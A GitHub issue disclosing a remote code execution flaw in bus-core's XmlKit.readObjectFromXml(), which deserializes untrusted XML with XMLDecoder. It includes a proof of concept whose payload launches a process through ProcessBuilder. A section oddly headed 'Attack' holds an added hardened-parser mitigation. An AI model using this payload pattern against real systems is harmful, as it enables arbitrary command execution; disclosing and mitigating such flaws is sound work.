Remote Code Execution caused by XmlUtils.readObjectFromXml() via untrusted XML String
Alex111998 opened this issue · 1 comments
Alex111998 commented
Description
bus-core provides XML utility classes that may be vulnerable to remote code execution when using XmlKit.readObjectFromXml() to interpret untrusted XML strings.
Detail
The program will call XMLDecoder.readObject to parse the XML string, causing a deserialization vulnerability.
Version
<= 8.0.0
POC
```java
import org.aoju.bus.core.toolkit.XmlKit;
import org.xml.sax.InputSource;
import java.io.StringReader;

public class MyTest {
    private static final String XML_STR = "<java>\n" +
            "  <object class=\"java.lang.ProcessBuilder\">\n" +
            "    <array class=\"java.lang.String\" length=\"1\">\n" +
            "      <void index=\"0\">\n" +
            "        <string>calc</string>\n" +
            "      </void>\n" +
            "    </array>\n" +
            "    <void method=\"start\"></void>\n" +
            "  </object>\n" +
            "</java>\n";

    public static void main(String[] args) {
        XmlKit.readObjectFromXml(new InputSource(new StringReader(XML_STR)));
    }
}
```
Attack
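The safe way to consume the same input is to treat untrusted XML as data rather than as a `java.beans` object graph. The following is an added example (not code from bus-core or from the reporter): it parses a constructed payload of the same shape with a hardened DOM parser, so no class is loaded and no method is invoked, and it flags documents that use the XMLDecoder archive root element.

```java
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import java.io.StringReader;

/** Hardened alternative to XMLDecoder.readObject() for untrusted input. */
public final class SafeXmlReader {

    // Constructed sample with the same shape as the report's PoC; harmless here
    // because it is only parsed into a DOM tree, never evaluated.
    private static final String UNTRUSTED = "<java><object class=\"java.lang.ProcessBuilder\">"
            + "<void method=\"start\"/></object></java>";

    public static Document parse(String xml) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Secure processing: no DOCTYPE, no external entities (XXE), no entity expansion.
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        DocumentBuilder b = f.newDocumentBuilder();
        return b.parse(new InputSource(new StringReader(xml)));
    }

    /** Extra guard: a root element named "java" is the java.beans XMLDecoder archive format. */
    public static boolean looksLikeBeansArchive(Document doc) {
        return "java".equals(doc.getDocumentElement().getTagName());
    }

    public static void main(String[] args) throws Exception {
        Document doc = parse(UNTRUSTED);
        // Only a tree of elements is produced; ProcessBuilder is never instantiated.
        System.out.println("root element: " + doc.getDocumentElement().getTagName());
        System.out.println("XMLDecoder-style archive: " + looksLikeBeansArchive(doc));
    }
}
```

Any application field that must be populated from the document should then be read explicitly from the DOM, so the input can never choose which classes are instantiated or which methods are called.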
839536 commented
Thank you. Your email is received and will be handled as soon as possible.